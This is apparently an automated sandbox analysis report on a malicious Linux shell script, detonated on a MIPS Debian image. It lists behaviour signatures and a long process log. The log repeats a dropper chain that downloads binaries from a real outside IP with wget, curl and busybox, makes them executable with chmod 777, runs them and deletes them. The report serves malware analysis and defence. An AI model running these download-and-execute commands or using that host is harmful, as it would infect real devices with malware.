Analysis Overview
SHA256
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91
Threat Level: Shows suspicious behavior
The file 56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 02:34
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 02:34
Reported
2024-10-28 02:36
Platform
debian9-mipsel-20240611-en
Max time kernel
78s
Max time network
80s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
Processes
/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/wget
[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
